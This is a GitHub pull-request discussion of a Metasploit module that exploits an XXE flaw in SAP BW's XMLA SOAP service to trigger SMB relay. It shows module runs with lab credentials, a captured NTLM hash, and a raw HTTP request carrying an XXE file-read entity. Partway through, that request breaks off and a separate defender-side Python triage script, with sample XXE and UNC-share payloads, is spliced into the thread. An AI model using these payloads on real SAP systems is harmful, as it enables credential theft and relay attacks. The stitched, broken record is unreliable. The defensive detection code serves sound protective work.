
SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1656

Merged
merged 2 commits into from
May 16, 2013

Conversation

nmonkee
Contributor

@nmonkee nmonkee commented Mar 25, 2013

This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.

SAP Note 1597066 / DSECRG-12-033.

ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity

@jvazquez-r7
Contributor

Trying to run it against a Windows installation results in the following error:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     c:\foo.txt       yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.186  yes       The target address range or CIDR identifier
   RPORT    8000             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.186:8000 - sending request for c:\foo.txt
[-] [SAP] 192.168.172.186:8000 - Error code: 200
[-] [SAP] 192.168.172.186:8000 - Error title: OK
[-] [SAP] 192.168.172.186:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Inconsistent input parameter (parameter: METHOD, value &lt;unknown&gt;)" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Contributor

And test results on Linux; no access to file contents there either:

msf auxiliary(sap_soap_xmla_bw_smb_relay) > show options

Module options (auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLIENT   001              yes       SAP client
   PASS     06071992         yes       Password
   PATH     /etc/passwod     yes       File path (e.g. \xx.xx.xx.xx\share)
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.172.179  yes       The target address range or CIDR identifier
   RPORT    8042             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   USER     SAP*             yes       Username
   VHOST                     no        HTTP server virtual host

msf auxiliary(sap_soap_xmla_bw_smb_relay) > run

[*] [SAP] 192.168.172.179:8042 - sending request for /etc/passwod
[-] [SAP] 192.168.172.179:8042 - Error code: 200
[-] [SAP] 192.168.172.179:8042 - Error title: OK
[-] [SAP] 192.168.172.179:8042 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Contributor

Any clues? Am I doing something wrong to test this module?

@nmonkee
Contributor Author

nmonkee commented May 9, 2013

Works fine:


msf  auxiliary(sap_soap_xmla_bw_smb_relay) > run
[*] [SAP] 192.168.1.86:8000 - sending request for \\192.168.1.71\share
[*] SMB Captured - 2013-05-09 22:31:02 +0100
NTLMv1 Response Captured from 192.168.1.86:51291 - 192.168.1.86 
USER:Administrator DOMAIN:GATEWAY OS: LM:
LMHASH:Disabled 
NTHASH:d9d3c192407bc93152376e16d6a3a3fa9aa53b3cf940f8d4
[*] [SAP] 192.168.1.86:8000 - Error code: 200
[*] [SAP] 192.168.1.86:8000 - Error title: OK
[*] [SAP] 192.168.1.86:8000 - Error message: <?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
                         SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <SOAP-ENV:Fault>
   <faultcode>XMLAnalysisError.0x80000005</faultcode>
   <faultstring>The XML for Analysis provider encountered an error</faultstring>
   <faultactor>XML for Analysis Provider</faultactor>
   <detail>
<Error ErrorCode="2147483653" Description="
Request transfered is not a valid XML/SOAP document" Source="XML for Analysis Provider" HelpFile="" />
   </detail>
  </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Contributor

It's just the SMB relay part; isn't the XXE expansion vuln working? I don't see this module as complete if we can't read arbitrary remote files.

@nmonkee
Contributor Author

nmonkee commented May 14, 2013

"An attacker can attempt to generate a "denial of service" situation or start an "SMB relay attack" using Document Type Definitions (DTD) via the SOAP/XMLA interface."

ref: https://service.sap.com/sap/support/notes/1597066

Any file read attempt results in the error "Request transfered is not a valid XML/SOAP document". I think this is a red herring as far as arbitrary file read goes, unless there is some trick I'm not aware of or haven't tried.


POST /sap/bw/xml/soap/xmla?sap-client=001&sap-language=EN HTTP/1.0
Host: 10.0.7.19:8000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sap-usercontext=sap-language=EN&sap-client=001
Authorization: Basic U0FQKjowNjA3MTk5Mg==
Content-Type: text/xml; charset=UTF-8
Content-Length: 126

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE request
[ 
<!ENTITY include SYSTEM "file:///c:/windows/win.ini">
>]
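The thread above establishes two things a defender cares about: the XMLA endpoint accepts a DOCTYPE in the SOAP body, and an external entity pointing at a UNC path makes the SAP host open an SMB session (captured NTLM above), while a file: entity only produces the "not a valid XML/SOAP document" fault. As an added example, not code from the Metasploit module, from SAP, or from anyone in this thread, the following Python triages XMLA request bodies the way a WAF rule or a log review would: it flags any DOCTYPE (a legitimate XMLA Discover/Execute request never carries one) and classifies each SYSTEM/PUBLIC entity by where it points. All sample bodies are constructed, and the 192.0.2.10 address is an RFC 5737 documentation address, not a host from this thread.

```python
"""Defender-side triage of XML-for-Analysis (XMLA) SOAP bodies for DTD / XXE abuse.
Added example; the request bodies and addresses below are constructed, not captured."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# A DOCTYPE has no business in an XMLA request, so its mere presence is a signal.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# External entity declarations: SYSTEM "uri"  or  PUBLIC "pubid" "uri" (single or double quotes).
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+"
    r"(?P<lits>(?:\"[^\"]*\"|'[^']*')(?:\s+(?:\"[^\"]*\"|'[^']*'))?)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    entity: str
    uri: str
    category: str  # "local-file", "unc-share", "remote-url" or "other"


def classify_uri(uri: str) -> str:
    """Map the system literal of an external entity to the behaviour it would trigger."""
    u = uri.strip().lower()
    if u.startswith("file:"):
        return "local-file"  # file read attempt, e.g. file:///c:/windows/win.ini
    if u.startswith("\\\\") or u.startswith("//") or u.startswith("smb:"):
        return "unc-share"   # server opens an SMB session to that host (credential capture/relay)
    if u.startswith(("http:", "https:", "ftp:")):
        return "remote-url"  # out-of-band callback / server-side request
    return "other"


def find_external_entities(body: str) -> List[Finding]:
    """Every SYSTEM/PUBLIC entity in the internal DTD subset, with its classified target."""
    findings = []
    for m in ENTITY_RE.finditer(body):
        pairs = re.findall(r"\"([^\"]*)\"|'([^']*)'", m.group("lits"))
        values = [a or b for a, b in pairs]        # one non-empty slot per literal
        uri = values[-1]                           # system literal is always the last one
        findings.append(Finding(m.group("name"), uri, classify_uri(uri)))
    return findings


def triage(body: str) -> dict:
    """Verdict for one request body: 'allow', or 'block' with the reasons to log."""
    reasons = []
    if DOCTYPE_RE.search(body):
        reasons.append("DOCTYPE present in SOAP body")
    for f in find_external_entities(body):
        reasons.append(f"external entity '{f.entity}' -> {f.uri} ({f.category})")
    return {"verdict": "block" if reasons else "allow", "reasons": reasons}


def safe_parse(body: str) -> ET.Element:
    """Reject any DTD before parsing. ElementTree does not fetch external entities,
    but refusing the DOCTYPE up front keeps the decision explicit and parser-independent."""
    if DOCTYPE_RE.search(body):
        raise ValueError("refusing XML with a DOCTYPE declaration")
    return ET.fromstring(body)


def rejects(body: str) -> bool:
    """True when safe_parse refuses the body (convenience for callers and tests)."""
    try:
        safe_parse(body)
    except ValueError:
        return True
    return False


# Constructed sample bodies (not traffic from the thread).
BENIGN = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">\n'
    ' <SOAP-ENV:Body><Discover xmlns="urn:schemas-microsoft-com:xml-analysis">\n'
    '  <RequestType>DISCOVER_DATASOURCES</RequestType><Restrictions/><Properties/>\n'
    ' </Discover></SOAP-ENV:Body></SOAP-ENV:Envelope>'
)
FILE_READ = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE request [\n <!ENTITY include SYSTEM "file:///c:/windows/win.ini">\n]>\n'
    '<request>&include;</request>'
)
SMB_RELAY = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE request [ <!ENTITY include SYSTEM "\\\\192.0.2.10\\share"> ]>\n'
    '<request>&include;</request>'
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("file-read", FILE_READ), ("smb", SMB_RELAY)):
        print(label, triage(body))
```

The "unc-share" category is the one worth alerting on for this endpoint: the thread shows the file: variant fails at the provider, but the UNC variant produces an outbound SMB authentication from the SAP server, so an egress rule blocking TCP 445/139 from application hosts and a log alert on DOCTYPE in XMLA bodies cover the vulnerability until SAP Note 1597066 is applied.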

@jvazquez-r7 jvazquez-r7 merged commit 1128663 into rapid7:master May 16, 2013
@jvazquez-r7
Contributor

@nmonkee shared pcaps for verification of the SMB relay attacks. Looks good. Merged after a little final cleanup:

d9bdf3d
